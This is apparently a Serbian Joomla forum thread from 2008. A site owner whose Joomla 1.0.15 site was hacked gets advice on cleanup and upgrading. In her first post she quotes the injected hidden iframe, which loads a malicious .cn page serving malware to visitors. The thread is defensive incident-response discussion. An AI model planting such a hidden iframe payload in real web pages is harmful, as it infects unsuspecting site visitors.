[Rešeno] Ubaceni linkovi u php fajlove- virus na sajtu

Moderators: cicans, TheHacker

Locked
techna
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Dec 03, 2008 7:33 am

[Rešeno] Ubaceni linkovi u php fajlove- virus na sajtu

Post by techna » Tue Dec 09, 2008 9:53 pm

Pozdrav svima!
Imam problem sa sajtom u Joomli 1.0.15. Sajt je do skoro bio u Joomli 1.0.13 kada su se pojavili problemi. Onda sam na nekoj starijoj verziji lokalno izvrsila azuriranje na verziju 1.0.15, obrisala sve na serveru i postavila update-ovanu verziju koja je nekoliko dana dobro radila a onda se javio isti problem:
Pri otvaranju prve strane pocinje otvaranje strane http://hugetopnonfat.cn/in.cgi?id1000, nasla sam u index
fajlu ubaceno:
<html><body><iframe src="http://hugetopnonfat.cn/in.cgi?id1000" width=1
height=1 style="visibility: hidden"></iframe></body></html>. Tako nesto je
bilo ubaceno i u jos neke php fajlove (npr. u neke module i komponente koji se otvraju na prvoj strani). Najgore je to
sto se sa te stranice ucitavaju virusi, reaguje antivirus program, a i iz
Windows-a dobijem poruku da su neki fajlovi zamenjeni nekim drugim
nepoznatim. Kad se to desilo sa ovom prethodnom verzijom, administrator web servera je pretrazio i bazu, ali u njoj nije bilo slicnih linkova tako da sam pri ponovnom postavljanju sajta, sad u verziji 1.0.15 samo postavila joomla foldere, a ne i bazu.
Mozete li da me posavetujete sta da radim:
- Svakako predstoji migracija na 1.5, ali da li bi to resilo problem tj. ali da li su ovi problemi zbog propusta u 1.0 (nisam nasla slican problem na forumu, mada vec danima citam i malo sam se izgubila u svim preporukama za bezbednost?) ili je problem u serveru?
- Da li treba da promenim server? Server radi pod Linuxom, a na njemu je Appache web server. Ako bih menjala da li postoje neki serveri kod nas koje mozete preporuciti za joomlu (ili to spada u reklamiranje, pa ne mozete dati takve preporuke?). Nisam u prilici da eksperimentisem.
Jednom recju: Sta da radim? Molim vas ako mozete da mi odgovorite sto pre. Unapred hvala.

User avatar
TheHacker
Joomla! Ace
Joomla! Ace
Posts: 1316
Joined: Sat Oct 13, 2007 1:12 pm
Location: Beograd
Contact:

Re: Ubaceni linkovi u php fajlove- virus na sajtu

Post by TheHacker » Wed Dec 10, 2008 8:43 am

pogledaj ovu temu http://forum.joomla.org/viewtopic.php?f=419&t=334615
zatim ako nemas puno sadrzaja i korisnika na sajtu preporucio bih ti da sve sto pre prebacis na novu verziju.A takodje postupi onako kako je VrloJakTim napisao u temi za koju sam ostavio link.
Web Arena - Tutorijali - Photoshop, Joomla, JavaScript... zanimljivosti, inspiracija... http://webarena.rs

techna
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Dec 03, 2008 7:33 am

Re: Ubaceni linkovi u php fajlove- virus na sajtu

Post by techna » Wed Dec 10, 2008 8:57 am

Hvala na odgovoru. Sad cu da probam, mada sam jednom vec sve brisala sa naloga, zatim u lokalu update-ovala na 1.0.15 sajt iz avgusta (jos pre postavljanja na web server) i to postavila na web server. To je funkcionisalo 3 dana i opet isti problem.

User avatar
TheHacker
Joomla! Ace
Joomla! Ace
Posts: 1316
Joined: Sat Oct 13, 2007 1:12 pm
Location: Beograd
Contact:

Re: Ubaceni linkovi u php fajlove- virus na sajtu

Post by TheHacker » Wed Dec 10, 2008 10:19 am

nema veze sto si ti brisala, zamoli hosting podrsku da to obrise ceo nalog i kreira ga o5 kao sto je VJT naveo....a takodje precesljaj sve fajlove koje imas i obavezno sto pre predji na poslednju stabilnu verziju Joomla! CMS-a
javi kako je sve proslo...
Web Arena - Tutorijali - Photoshop, Joomla, JavaScript... zanimljivosti, inspiracija... http://webarena.rs

techna
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Dec 03, 2008 7:33 am

Re: Ubaceni linkovi u php fajlove- virus na sajtu

Post by techna » Thu Dec 25, 2008 6:27 pm

Evo da se javim posto sajt radi nekih desetak dana normalno (valjda ce tako i ostati dok ga uskoro ne zamenim 1.5 verzijom). Administrator mi je obrisao sve sa naloga, promenio lozinku, uploadovala sam sajt u verziji 1.0.15 koristeci SSH (do sada sam koristila ftp). U medjuvremenu je i na serveru update-ovan PHP i Apache.
Inace, utvredila sam da je sajt bio zrtva "iframe" upada: u pojedine php kodove ubaceni su iframe tagovi velicine 0x0 tako da se njihovo otvranje ne vidi na stranama sajta. U tim frame-ovima se otvaraju te nezeljene strane sa Interneta.
Puno hvala na pomoci. Pozdrav

User avatar
TheHacker
Joomla! Ace
Joomla! Ace
Posts: 1316
Joined: Sat Oct 13, 2007 1:12 pm
Location: Beograd
Contact:

Re: Ubaceni linkovi u php fajlove- virus na sajtu

Post by TheHacker » Thu Dec 25, 2008 11:11 pm

Molim i drugi put :)
inace na forumu imas dosta o migraciji na novu verziju (sto ti je i moja topla preporuka), a takodje imas i ovde dosta dokumentacije koja ti moze pomoci http://help.joomlaserbia.com/doku.php
Samo ubaci jedno reseno u naslov i zelenu ikonicu u prvi post, a ako ne mozes da ga editujes posalji mi PM pa cu ja to uraditi :)
Web Arena - Tutorijali - Photoshop, Joomla, JavaScript... zanimljivosti, inspiracija... http://webarena.rs


Locked

Return to “Bezbednost”